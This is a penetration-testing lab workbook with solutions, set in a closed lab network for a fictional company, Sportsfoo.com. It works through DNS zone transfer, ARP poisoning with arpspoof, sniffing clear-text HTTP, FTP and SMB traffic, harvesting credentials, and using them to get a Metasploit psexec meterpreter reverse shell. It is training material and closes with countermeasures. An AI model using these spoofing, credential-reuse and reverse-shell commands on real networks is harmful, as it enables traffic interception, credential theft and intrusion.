1. LAB SNIFFING LAB ID: 10

H E R A LAB ID: 10 SNIFFING Sniffing in a switched network ARP Poisoning Analyzing a network traffic Extracting files from a network trace Stealing credentials Mapping/exploring network resources

1. LAB You are a Penetration Tester and you re asked to determine if a very sensitive network segment is secure. The client named Sportsfoo.com is a small research company specialized in Sports, so all data from a specific segment should only be available to the authorized users and should not be exposed to anybody else. The scope provided by the client is any host/device on the 172.16.5.0/24 network. The following image represents the LAB environment: Network 172.16.5.0 172.16.5.x PENTESTER elearnsecurity s.r.l. 2012 H E R A 2

2. GOALS Map the network Sniff the traffic Review the network traffic List your findings See what you can do with the credentials discovered Bonus: Provide a list of countermeasures to your client 3. WHAT YOU WILL LEARN How to map a network How to sniff in a switched network ARP Poisoning attack Review FTP and HTTP packets Obtain files transferred via SMB How to use the sensitive information obtained from the network trace in order to expand your access to the network To guide you during the lab you will find different Tasks. Tasks are meant for educational purposes and to show you the usage of different tools and different methods to achieve the same goal. They are not meant to be used as a methodology. elearnsecurity s.r.l. 2012 H E R A 3

Armed with the skills acquired though the task you can achieve the Lab goal. If this is the first time you do this lab, we advise you to follow these Tasks. Once you have completed all the Tasks, you can proceed to the end of this paper and check the solutions. 4. RECOMMENDED TOOLS netdiscover nmap arpspoof driftnet Wireshark Metasploit / PSEXEC SMBmount 5. IMPORTANT NOTE Further information: Labs machines (like web server and internal organization machines) are not connected to the internet. In order to connect to the target organization website you have to insert the following line in your hosts file: elearnsecurity s.r.l. 2012 H E R A 4

10.10.10.10 intranet.sportsfoo.com ------------------------------------------ hosts path --------------------------------------- Windows: C:\Windows\System32\drivers\etc\hosts Linux: /etc/hosts elearnsecurity s.r.l. 2012 H E R A 5

1. TASKS Task 1: Host Discovery Using ARP requests Using only ARP packets, please list all online hosts of the network 172.16.5.0/24. Mac Address Host IP address Please, list another way (another tool and its parameters) you could use to get the same information (still using only ARP packets): Task 2: Host Discovery Using DNS Task 2.1: Determine the DNS Server Perform a port scan in all of the hosts above in order to identify which one is running the DNS Service. Be very specific, so make sure you will only check for the DNS Port. Also, using the same command line, determine if the DNS Server is running Linux, BSD, or Windows. DNS Server IP Address elearnsecurity s.r.l. 2012 H E R A 6

Task 2.2: Determine the domain name Using any DNS Lookup tool, please, determine for what domain name this DNS Server is authoritative. Domain Name Task 2.3: List additional hosts using DNS zone transfer Once you know the domain name and the DNS Server address, please, check if you are able to identify new hosts using a DNS zone transfer. New Hosts Can you tell why the hosts above were not found using ARP requests? Task 3: Identify the default gateway for the 172.16.5.0/24 network According to all tasks above, you have been able to identify two different networks. Now we need to identify the default gateway who is handling the communication between these networks. How can you do that? elearnsecurity s.r.l. 2012 H E R A 7

Task 4: Draw a network map Let s draw a network map in order to graphic represent the environment that we have discovered so far. Task 5: Sniff packets between the hosts 172.16.5.5 and 172.16.5.1 Sniff all packets sent/received between the hosts 172.16.5.5 and 172.16.5.1. Keep yourself sniffing this target for 5 minutes. Save the network trace as /root/task5.pcap. Make sure you are able to see all images while you are sniffing. Task 6: Sniff packets between the hosts 172.16.5.6 and 172.16.5.1 Sniff all packets sent/received between the hosts 172.16.5.6 and 172.16.5.1. Keep yourself sniffing this target for 5 minutes. Save the network trace as /root/task6.pcap. Task 7: Sniff packets between the hosts 172.16.5.6 and 172.16.5.10 Sniff all packets sent/received between the hosts 172.16.5.6 and 172.16.5.10. Keep yourself sniffing this target for 5 minutes. Save the network trace as /root/task7.pcap. Task 8: Analyze the file /root/task5.pcap Task 8.1: Understand the big picture of the network traffic elearnsecurity s.r.l. 2012 H E R A 8

Before diving into every single packet of the network trace, first try to a big picture of what was obtained. Identify the most used protocols. HTTP Percentage: FTP Percentage: Task 8.2: Analyze the HTTP traffic Part 1 Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure your filter don t show any packet originated or destined to your (attacker) machine. The HTTP protocol consists of a couple of different commands (full details are available on the RFC 2616). Task 8.3: Analyze the HTTP traffic Part 2 Remember that we were hired to determine if that network segment is secure, so analyze all of the packets and determine which ones are secure. Task 8.4: Analyze the HTTP traffic Part 3 Find at least 2 HTTP requests which are not secure, but they don t seem to contain confidential information. Task 8.5: Analyze the HTTP traffic Part 4 Find at least 2 HTTP requests that are really insecure and expose your client to big problems like identity theft, privilege escalation, etc. elearnsecurity s.r.l. 2012 H E R A 9

Task 8.6: Analyze the FTP traffic Part 1 Create a filter in Wireshark to show only the FTP traffic. Task 8.7: Analyze the FTP traffic Part 2 List the ftp commands issued by the host 172.16.5.5. Task 8.8: Analyze the FTP traffic Part 2 What is the username and password used during that FTP connection? Task 9: Analyze the file /root/task6.pcap Task 9.1: Determine the username and password in use for the website http://intranet.sportsfoo.com Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host 172.16.5.6 when accessing the http://intranet.sportsfoo.com Username Password Task 9.2: Recovery all of the files downloaded by the user above By reviewing all of the HTTP GET requests, describe all of the files that were retrieved by the user above. elearnsecurity s.r.l. 2012 H E R A 10

Task 10: Analyze the file /root/task7.pcap Review the network trace obtained via task 7. Identify two files which were transferred via SMB and its contents. Filename Contents Task 11: Use the credentials gathered in order to see what access you can get on the host 172.16.5.10 With two different credentials in handy, check if you can access the following resources: \\172.16.5.10\finance Credential: \\172.16.5.10\technology Credential: Remote shell on the 172.16.5.10 Credential: Task 12: Countermeasures List at least one countermeasure that your client could implement for some of the problems identified during the test. 1. What protocol can be used on the http://intranet.sportsfoo.com in order to avoid that credentials are transmitted in clear-text? elearnsecurity s.r.l. 2012 H E R A 11

2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com? 3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN are encrypted? 4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks? elearnsecurity s.r.l. 2012 H E R A 12

Solutions elearnsecurity s.r.l. 2012 H E R A 13

Task 1: Host Discovery Using ARP requests SNIFFING LAB ID: 10 Answer: netdiscover i tap0 r 172.16.5.0/24 Explanation: The netdiscover command works by sending ARP requests to the broadcast address asking for specific IP address range (if specified). ARP (Address Resolution Protocol) is a protocol used for resolution of network layer addresses (IP address) into link layer addresses (MAC address). ARP works on the layer 2 of the OSI model, so it can only be used to discovery hosts which are located in the same subnet. As you can see on the screenshot below, many ARP packets were sent to the Broadcast address (ff:ff:ff:ff:ff:ff), however, ARP replies were only obtained from the hosts which are live: 172.16.5.1, 172.16.5.5, 172.16.5.6, and 172.16.5.10. Mac Address Host IP address 00:50:56:b1:04:bc 172.16.5.1 00:50:56:b1:05:b6 172.16.5.5 00:50:56:b1:05:b9 172.16.5.6 elearnsecurity s.r.l. 2012 H E R A 14

00:50:56:b1:05:ba 172.16.5.10 Please, list another way (another tool and its parameters) you could use to do host discovery using only ARP requests: Answer: nmap PR sn 172.16.5.1-255 Task 2: Host Discovery Using DNS Task 2.1: Determine the DNS Server Answer: nmap st v p53 172.16.5.1 172.16.5.5 172.16.5.6 172.16.5.10 Explanation: As we already have a list of hosts found, now, we need to query each one of these hosts in order to identify who is running the DNS service. DNS port is TCP/53 (for zone transfer) and UDP/53 (for DNS queries), all we need to do is to check if the TCP port 53 is open in all of the hosts that we know are online. The command above is issued above tells nmap to use a TCP connect scan (-st) to the port 53 (-p53) to the hosts 172.16.5.1, 172.16.5.5, 172.16.5.6, and 172.16.5.10. As shown in the screenshot below, NMAP sent four SYN packets, targeting the port 53 of all of these hosts. According to the TCP 3-way handshake, the hosts which are listening to that port should answer with a SYN,ACK packet. The hosts which don t have the port 53 open should answer with a RST,ACK packet. As we can see on the screenshot, the only host which replied with a SYN,ACK packet is the 172.16.5.10, while the host 172.1.16.5.6 replied with a RST,ACK packet which means that port is closed. The hosts 172.16.5.1 and 172.16.5.5 have not responded with any elearnsecurity s.r.l. 2012 H E R A 15

packet which means that likely a firewall is in place (or another packet filtering mechanism). DNS Server IP Address 172.16.5.10 Task 2.2: Determine the domain name Answer: sportsfoo.com Explanation: Once we already know a couple of hosts of our client and also who is the DNS Server for that network, our next step is to identify the network domain name. We can do that by using reverse lookups with nslookup or dig. nslookup (here we are launching the nslookup utility) > server 172.16.5.10 (here we are telling the tool to use a specific DNS server. By default nslookup uses the DNS servers specified on the file /etc/resolv.conf) Default server: 172.16.5.10 Address: 172.16.5.10#53 > 172.16.5.5 elearnsecurity s.r.l. 2012 H E R A 16

(here we are asking the DNS server to tell us what is the FQDN - fully qualified domain name - for the host 172.16.5.5. We could use any known IP address). Server: 172.16.5.10 Address: 172.16.5.10#53 5.5.16.172.in-addr.arpa name = wkst-techsupport.sportsfoo.com. You could also use dig for the task above. The following command line would do all of the work above: dig @172.16.5.10 x 172.16.5.5 Task 2.3: List additional hosts using DNS zone transfer Answer: dig @172.16.5.10 sportsfoo.com -t AXFR Explanation: Zone transfers are, usually, misconfigurations of a DNS server. They should be enabled, if required, only for trusted IP addresses (usually trusted downstream name servers). When zone transfers are open to anyone, we can enumerate the whole DNS record for that zone. There are a couple of different tools that are able to do that, however, we will focus on dig. The command dig @172.16.5.10 sportsfoo.com t AXFR asks the DNS Server 172.16.5.10 to list all of their records (full zone transfer t AXFR) for the domain named: sportsfoo.com. The full command and its results are listed below. Note that we were able to discovery two new hosts: 10.10.10.6 and 10.10.10.10. dig @172.16.5.10 sportsfoo.com -t AXFR ; <<>> DiG 9.7.0-P1 <<>> @172.16.5.10 sportsfoo.com -t AXFR ; (1 server found) ;; global options: +cmd elearnsecurity s.r.l. 2012 H E R A 17

sportsfoo.com. 3600 IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com. 19 900 600 86400 3600 sportsfoo.com. 3600 IN NS els-winser2003.sportsfoo.com. sportsfoo.com. 3600 IN NS els-winser2003.sports.com. els-winser2003.sportsfoo.com. 3600 IN A 172.16.5.10 ftp.sportsfoo.com. 3600 IN A 10.10.10.6 intranet.sportsfoo.com. 3600 IN A 10.10.10.10 wkst-finance.sportsfoo.com. 3600 IN A 172.16.5.6 wkst-techsupport.sportsfoo.com. 3600 IN A 172.16.5.5 sportsfoo.com. 3600 IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com. 19 900 600 86400 3600 ;; Query time: 411 msec ;; SERVER: 172.16.5.10#53(172.16.5.10) ;; WHEN: Sun Nov 18 03:19:16 2012 ;; XFR size: 9 records (messages 9, bytes 609) The new hosts found belong to a different network (10.10.10.x). As the penetration tester laptop is placed in the network 172.16.5.0/24 and all of the host discovered performed so far were only done using ARP packets, we then understand that we were unable to find these hosts before because ARP packets can only sent to machines in the same broadcast domain, so ARP discovery only works for hosts in the same subnet. elearnsecurity s.r.l. 2012 H E R A 18

Task 3: Identify the default gateway for the 172.16.5.0/24 network Answer: The default gateway is 172.16.5.1 Explanation: One of the methods that could be used to identify the default gateway of a network is to track the packets taken from an IP network on their way to a given host. The command traceroute does exactly that, however, in this case looks like the default gateway is blocking ICMP packets, so traceroute is not going to help here. Another way to try to identify the default gateway is to evaluating the already existing routes in your system. You can do that by running the route command. As you can see below, always that the penetration tester needs to communicate with the network 10.10.10.0, it s going to use the gateway 172.16.5.1. Note: In order to be able to sniff packets properly using arpspoof, you will need to use the same default gateway that the one which is in use by your target. elearnsecurity s.r.l. 2012 H E R A 19

Task 4: Draw a network map This is a possible graphic representation after compiling all information gathered so far: 172.16.5.5 wkst-techsupport.sportsfoo.com 172.16.5.6 wkst-finance.sportsfoo.com Default Gateway 172.16.5.1 Network 172.16.5.0 Network 10.10.10 172.16.5.x PENTESTER 172.16.5.10 els-winser2003.sportsfoo.com DNS Server 10.10.10.6 ftp.sportsfoo.com 10.10.10.10 intranet.sportsfoo.com Task 5: Sniff packets between the hosts 172.16.5.5 and 172.16.5.1 In order to sniff all packets between the hosts 172.16.5.5 and 172.16.5.1 we can follow the instructions below: 1-) Prepare to collect all of the network traffic sent to/from your target: 1.1-) Launch Wireshark (If you are using Backtrack, click Applications, Forensics, Network Forensics, Wireshark). 1.2-) Select the network interface that you intend to grab network traffic (Click Capture, Interfaces, check tap0, and then click Start). 2-) Enable IP forward in your system. To do this, run the following command: echo 1 > /proc/sys/net/ipv4/ip_forward elearnsecurity s.r.l. 2012 H E R A 20

3-) Now we will need to trick our targets. We will need to tell to the IP address 172.16.5.5 that every time that it needs to communicate to the IP address 172.16.5.1, it should forward the request to the PENTESTER system and vice-versa. It can be done by the following commands (we will need two different terminal windows to run these commands): arpspoof i tap0 t 172.16.5.5 172.16.5.1 arpspoof i tap0 t 172.16.5.1 172.16.5.5 The commands above will keep sending ARP packets in order to trick the ARP table of both hosts. It will set the ARP table in a malicious way so always that the host 172.16.5.5 needs to communicate to the 172.16.5.1, instead of going to the MAC Address of the host 172.16.5.1, it will go to the MAC address of our system (penetration tester). In order to illustrate this attack, consider the following ARP table cache displayed on the system 172.16.5.5 before launching the attack: elearnsecurity s.r.l. 2012 H E R A 21

Now, see the same ARP cache table after launching our attack: elearnsecurity s.r.l. 2012 H E R A 22

4-) Launch driftnet in order to see if are any images on the traffic between these hosts, so you can might have a clue about what they are doing. To do that, run the following command: driftnet i tap0 You might be able to see some images like: 5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task5.pcap so we can review it later. elearnsecurity s.r.l. 2012 H E R A 23

Task 6: Sniff packets between the hosts 172.16.5.6 and 172.16.5.1 We will need to repeat the same technique used in Task 5, so let s summarize what we will need to do: 1-) Start Wireshark and start a new capture by selecting the proper network interface tap0. 2-) Check if IP Forward is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If its 1, it means that it s already enabled. If its disabled, make sure that you enable it by running the command: echo 1 > /proc/sys/net/ipv4/ip_forward 3-) Now we will need to trick our targets by changing their ARP cache table. For that, we will need to open two different terminal windows and run the following commands: arpspoof i tap0 t 172.16.5.6 172.16.5.1 arpspoof i tap0 t 172.16.5.1 172.16.5.6 4-) Launch driftnet in order to see if so you can have an understanding about what is happening between these hosts. To do that, run the following command: driftnet i tap0 You might be able to see some images like: elearnsecurity s.r.l. 2012 H E R A 24

5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task6.pcap so we can review it later. Task 7: Sniff packets between the hosts 172.16.5.6 and 172.16.5.10 We will need to repeat the same techniques used in Task 5 and 6, so: 1-) Start Wireshark and start a new capture by selecting the network interface tap0. 2-) Check if IP Forward is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If its 1, it means that it s already enabled. So if its disabled, make sure that you enable it by running the command: elearnsecurity s.r.l. 2012 H E R A 25

echo 1 > /proc/sys/net/ipv4/ip_forward 3-) Now we will need to trick our targets by changing their ARP cache table. For that, we will need to open two different terminal windows and run the following commands: arpspoof i tap0 t 172.16.5.6 172.16.5.10 arpspoof i tap0 t 172.16.5.10 172.16.5.6 4-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task7.pcap so we can review it later. Task 8: Analyze the file /root/task5.pcap Task 8.1: Understand the big picture of the network traffic gathered Before diving into every packet of the network trace, first try to understand the type of traffic that was obtained. We can do that by opening the file /root/task5.pcap in Wireshark and then Statistics, Protocol Hierarchy. elearnsecurity s.r.l. 2012 H E R A 26

According to the screenshot above, we can see that from all traffic obtained, we got 2,02% of FTP traffic, 4,19% of HTTP traffic, and then 5,63% of SSL traffic. Task 8.2: Analyze the HTTP traffic Part 1 Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure that you only see the network traffic sent and received by your target (172.16.5.5). You can do that by inserting the following string on the filter field as highlighted below: http and ip.addr == 172.16.5.5 Task 8.3: Analyze the HTTP traffic Part 2 After analyzing the HTTP traffic we were able to understand that it s a protocol which consists of a bunch of requests and responses basically. Also all traffic transmitted in HTTP is also transmitted in clear-text. elearnsecurity s.r.l. 2012 H E R A 27

SSL is the protocol which implements security for the HTTP protocol. When you use SSL, all of your strings are not transmitted in clear-text, so even if someone is able to capture your traffic, it will be a hard time to try to decrypt it in order to understand what s going on. So, in order to determine which packets sent/received by the host 172.16.5.5 are secure, all we need to do is to create a filter for SSL packets: Task 8.4: Analyze the HTTP traffic Part 3 One of the main commands used on the HTTP protocol is the HTTP GET request. HTTP GET requests are usually used when you want to retrieve a file from a webserver. In the screenshot below, we could see that the user has browsed to the file casillas.png on the http://intranet.sportsfoo.com website. You can see the HTTP GET request (in red) and also the HTTP Response from the server (in blue): elearnsecurity s.r.l. 2012 H E R A 28

So while the information is being transmitted in clear-text on the network, likely the only fact that the user is browsing to that website and downloading a couple of files is not a big deal. We can see other HTTP GET requests issued by the user by creating the following filter in Wireshark: http.request.method == GET elearnsecurity s.r.l. 2012 H E R A 29

Task 8.5: Analyze the HTTP traffic Part 4 The HTTP POST request is usually used when an user wants to submit an information to the webserver (like filling a form). So its definitively something that we want to check in order to see if critical information is being transmitted in clear-text. We can do that by creating the following filter in Wireshark: http.request.method == POST As you can see on the screenshot below, there are a couple of POST requests with a very interesting name: POST /checklogin.php. Let s take a look closer to one of these requests by selecting one of these packets, right click on it, and then select Follow TCP Stream: elearnsecurity s.r.l. 2012 H E R A 30

According to the screenshot above, we are able to see an attempt to login on the http://intranet.sportsfoo.com website by submitting the username gfreitas and the password Silv@n@. However, looks like it failed, because the server answered with a HTTP 302 code which is redirecting the user to a page named notheremyfriend.php. Even if this credential is not valid for this website, an attacker might want to use that credential when attacking other resources. On the same screen (Follow TCP Stream), click in the button named Filter out This Stream, so Wireshark will exclude temporary this request from the remaining packets, so you can continue your analysis. You will have to repeat the procedure above until you find a valid credential. According to the example below we were able to obtain a valid credential. While the password et1@sr7! used by the user admin is a strong one, it doesn t helps since it is being transmitted in clear-text. Note: You can try to validate this credential by trying to login on the http://intranet.sportsfoo.com website. elearnsecurity s.r.l. 2012 H E R A 31

Task 8.6: Analyze the FTP traffic Part 1 Create a filter in Wireshark to show only the FTP traffic. It s pretty simple by just typing ftp on the Filter field and hitting <Enter> or by clicking on the Apply button. Task 8.7: Analyze the FTP traffic Part 2 List the ftp commands issued by the host 172.16.5.5. We can do that by selecting the first packet, right click on it, and select Follow TCP Stream: All of the commands issued by the user are in red and all of the server responses are in blue. elearnsecurity s.r.l. 2012 H E R A 32

Task 8.8: Analyze the FTP traffic Part 2 What is the username and password used during that FTP connection? According to the screenshot above, the username is admin and the password is et1@sr7! Task 9: Analyze the file /root/task6.pcap Task 9.1: Determine what the username and password in use for the website http://intranet.sportsfoo.com Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host 172.16.5.6 when accessing the http://intranet.sportsfoo.com. According to the second screenshot of the Task 8.7, we already got an understanding that when an user is able to login successfully it will get a HTTP 302 response which will redirect the user to the page named login_success.php. If the authentication fails, it will also get a HTTP 302 response, however, the user will be redirected to the page named notheremyfriend.php. With that in mind, instead of going through every single HTTP we can just create and apply a filter that will just show all of the packets of our interest: http.location == login_success.php elearnsecurity s.r.l. 2012 H E R A 33

Then, right click in any of these packets and select Follow TCP Stream: According to the screenshot below, we were able to identify one more working credentials: Username almir Password Corinthians2012 Task 9.2: Recovery all of the files downloaded by the user above Use the following steps in order to recovery (retrieve) all of the files downloaded by the user: 1-) Launch Wireshark and then open the following file: /root/task6.pcap 2-) Click File, Open, Export Objects, HTTP elearnsecurity s.r.l. 2012 H E R A 34

Select one or more files and save to a folder of your preference. elearnsecurity s.r.l. 2012 H E R A 35

According to the screenshot below we were able to retrieve the files successfully: Task 10: Analyze the file /root/task7.pcap Review the network trace obtained in task 7. Identify two files which were transferred via SMB and its contents. 1-) Launch Wireshark and open the file /root/task7.pcap 2-) Click Statistics, Protocol Hierarchy in order to get an understanding of the type of traffic that we will need to deal with. elearnsecurity s.r.l. 2012 H E R A 36

3-) According to the screenshot above, looks like there was a significant amount of traffic being transmitted via SMB. So let s create a filter in Wireshark so we can only see traffic related to this protocol. We just need to type smb on the filter field and then click Apply: 4-) We can have a clue if there were any file transmitted via SMB by creating a filter with the following string: smb.file: 5-) According to the screenshot above, looks like there are some interesting files being transmitted via SMB. We can try to retrieve those files using the following steps: 5.1-) Click File, Export Objects, SMB. 5.2-) You should see a list of files that were transmitted via SMB. Note that looks like we have two different files. The first one has 374 bytes and the other has 662 bytes. According to the screenshot above, probably one of the files is the performance.doc and the other one is the salaries.doc. elearnsecurity s.r.l. 2012 H E R A 37

5.3-) Save all files to a folder of your preference and give the.doc extension to them. Then open the files in order to see their content: elearnsecurity s.r.l. 2012 H E R A 38

Task 11: Use the credentials gathered in order to see what access you can get on the host 172.16.5.10 With two different credentials in handy, check if you can access the following resources: 1-) \\172.16.5.10\finance 2-) \\172.16.5.10\technology 3-) Remote shell on the 172.16.5.10 According to the tasks 8.5 and 8.7, we have discovered the following credential: Username admin Password et1@sr7! According to the task 9.1, we have discovered the credential below: Username almir Password Corinthians2012 Now, all we need to do is to test the credentials above in order to see which one can access the resources above. 11.1 Testing access to the UNC share: \\172.16.5.10\finance 1-) We can use the command smbmount in order to mount a UNC share in our Linux system. To do this we will need to type: Smbmount //172.16.5.10/finance /tmp/finance o username=almir,password=corinthians2012,rw elearnsecurity s.r.l. 2012 H E R A 39

11.2 Testing access to the UNC share: \\172.16.5.10\technology 1-) We can use the command smbmount in order to mount a UNC share in our Linux system. To do this we will need to type: Smbmount //172.16.5.10/technology /tmp/technology o username=admin,password=et1@sr7! elearnsecurity s.r.l. 2012 H E R A 40

11.3 Testing if you are able to get a remote shell on the 172.16.5.10 1-) Once we have two valid credentials we might want to try to get a remote shell by using the PSEXEC exploit. In order to do that, open the Metasploit Console (msfconsole) and prepare an exploit according to the parameters below: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBUser admin SMBUser => admin msf exploit(psexec) > set SMBPass et1@sr7! SMBPass => et1@sr7! msf exploit(psexec) > set RHOST 172.16.5.10 RHOST => 172.16.5.10 msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 172.16.5.101 (Pentester IP address) LHOST => 172.16.5.101 msf exploit(psexec) > exploit 2-) Once you run the exploit above, you will see that you will be able to get a remote shell on the host 172.16.5.10 successfully, since the credential used (admin) is also a local administrator account for that particular host: elearnsecurity s.r.l. 2012 H E R A 41

[*] Started reverse handler on 172.16.5.101:4444 [*] Connecting to the server... [*] Authenticating to 172.16.5.10:445 WORKGROUP as user 'admin'... [*] Uploading payload... [*] Created \gntqvmkk.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.5.10[\svcctl]... [*] Bound to 367abb81-9844-35f12-98f038001003:2.0@ncacn_np:172.16.5.10[\svcctl]... [*] Obtaining a service manager handle... [*] Creating a new service (ZdlTfEpQ - "MSTOPiQJKeoqes")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Sending stage (752128 bytes) to 172.16.5.10 [*] Closing service handle... [*] Deleting \gntqvmkk.exe... [*] Meterpreter session 1 opened (172.16.5.101:4444 -> 172.16.5.10:1594) at 2012-11-18 18:55:11-0200 meterpreter > shell Process 3716 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>hostname hostname els-winser2003 C:\WINDOWS\system32> Task 12: Countermeasures List at least one countermeasure that your client could implement for some of the issues identified during the test: 1. What protocol can be used on the http://intranet.sportsfoo.com website in order to avoid that credentials are transmitted in clear-text? elearnsecurity s.r.l. 2012 H E R A 42

Answer: SSL 2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com? Answer: SFTP 3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN are encrypted? Answer: IPSEC 4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks? Answer: You can use static ARP entries elearnsecurity s.r.l. 2012 H E R A 43